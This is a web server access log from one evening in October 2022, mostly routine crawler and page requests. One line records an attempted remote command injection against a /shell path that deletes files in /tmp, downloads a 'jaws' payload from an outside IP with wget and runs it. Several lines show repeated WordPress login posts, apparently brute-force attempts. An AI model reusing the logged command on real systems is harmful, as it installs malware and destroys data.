190.145.240.68 - - [01/Oct/2022:21:02:33 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18BFDZz+OmYh+NQXKlUJfABp52hFRE7oCGigSdNHmsKkI6imvq8lWb2&y=U2FsdGVkX1/5GVxUDL3RtR21H+urzHn3DCLz/BNXpwkXaVLwN6X9ptNEQkua3tpW HTTP/1.1" 503 1124
190.145.240.68 - - [01/Oct/2022:21:02:35 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18eQ824szd9qvOuGRIOQPLZDslFJdau2o7LncSW00tZqfcLVNb13h5V&y=U2FsdGVkX18+sClozHhCV4WYWp/hn9RFPgH57kfv80kopQrzzuGvY3craJIgXv3p HTTP/1.1" 503 1124
201.245.192.253 - - [01/Oct/2022:21:02:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [01/Oct/2022:21:03:00 -0500] "HEAD / HTTP/1.1" 200 -
64.124.8.25 - - [01/Oct/2022:21:03:11 -0500] "-" 408 -
172.22.2.4 - - [01/Oct/2022:21:03:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
64.124.8.25 - - [01/Oct/2022:21:05:34 -0500] "-" 408 -
40.77.202.176 - - [01/Oct/2022:21:06:07 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
40.77.202.167 - - [01/Oct/2022:21:06:08 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
40.77.202.69 - - [01/Oct/2022:21:06:08 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
40.77.202.132 - - [01/Oct/2022:21:06:09 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
40.77.202.148 - - [01/Oct/2022:21:06:10 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
40.77.202.182 - - [01/Oct/2022:21:06:12 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
40.77.202.42 - - [01/Oct/2022:21:06:18 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
40.77.202.9 - - [01/Oct/2022:21:06:20 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
40.77.202.9 - - [01/Oct/2022:21:06:20 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
40.77.202.182 - - [01/Oct/2022:21:06:21 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
172.22.2.4 - - [01/Oct/2022:21:04:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54003
207.46.13.190 - - [01/Oct/2022:21:06:23 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2020%2F HTTP/1.1" 200 165994
201.245.192.253 - - [01/Oct/2022:21:07:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [01/Oct/2022:21:08:00 -0500] "HEAD / HTTP/1.1" 200 -
64.124.8.25 - - [01/Oct/2022:21:08:08 -0500] "-" 408 -
66.249.73.88 - - [01/Oct/2022:21:08:28 -0500] "-" 408 -
181.51.207.244 - - [01/Oct/2022:21:08:46 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.51.207.244 - - [01/Oct/2022:21:08:46 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.51.207.244 - - [01/Oct/2022:21:08:46 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
185.119.81.96 - - [01/Oct/2022:21:08:51 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.96 - - [01/Oct/2022:21:08:52 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
156.223.36.183 - - [01/Oct/2022:21:09:32 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.216.71.192/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
64.124.8.25 - - [01/Oct/2022:21:10:23 -0500] "-" 408 -
64.124.8.25 - - [01/Oct/2022:21:11:02 -0500] "-" 408 -
200.114.54.5 - - [01/Oct/2022:21:11:04 -0500] "-" 408 -
64.124.8.25 - - [01/Oct/2022:21:11:17 -0500] "-" 408 -
172.22.2.4 - - [01/Oct/2022:21:09:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [01/Oct/2022:21:10:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58955
201.245.192.253 - - [01/Oct/2022:21:12:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [01/Oct/2022:21:13:00 -0500] "HEAD / HTTP/1.1" 200 -
64.124.8.25 - - [01/Oct/2022:21:13:06 -0500] "-" 408 -
157.55.39.202 - - [01/Oct/2022:21:13:23 -0500] "GET / HTTP/1.1" 200 319
95.108.213.46 - - [01/Oct/2022:21:13:43 -0500] "-" 408 -
69.171.231.6 - - [01/Oct/2022:21:15:14 -0500] "GET /images/Junio%2002-experiencias-jardines-verticales-sda.jpeg HTTP/1.1" 200 31171
66.249.73.84 - - [01/Oct/2022:21:16:04 -0500] "-" 408 -
172.22.2.4 - - [01/Oct/2022:21:15:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
13.66.139.9 - - [01/Oct/2022:21:17:14 -0500] "GET /BLA/resoluciones/AUTOS%202019/1587.pdf HTTP/1.1" 200 265508
201.245.192.253 - - [01/Oct/2022:21:17:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
157.55.39.25 - - [01/Oct/2022:21:17:45 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
216.245.221.92 - - [01/Oct/2022:21:18:00 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [01/Oct/2022:21:16:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
207.46.13.40 - - [01/Oct/2022:21:20:09 -0500] "GET /BLA/resoluciones/AUTOS%202022/1285.pdf HTTP/1.1" 200 415623
207.46.13.230 - - [01/Oct/2022:21:20:31 -0500] "-" 408 -
201.245.192.253 - - [01/Oct/2022:21:21:47 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [01/Oct/2022:21:21:48 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
173.252.87.17 - - [01/Oct/2022:21:22:22 -0500] "GET /images/Junio%2002-experiencias-jardines-verticales-sda.jpeg HTTP/1.1" 200 31171
201.245.192.253 - - [01/Oct/2022:21:22:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [01/Oct/2022:21:23:00 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [01/Oct/2022:21:21:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
185.119.81.109 - - [01/Oct/2022:21:23:35 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.109 - - [01/Oct/2022:21:23:36 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
95.108.213.41 - - [01/Oct/2022:21:23:43 -0500] "-" 408 -
172.22.2.4 - - [01/Oct/2022:21:22:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
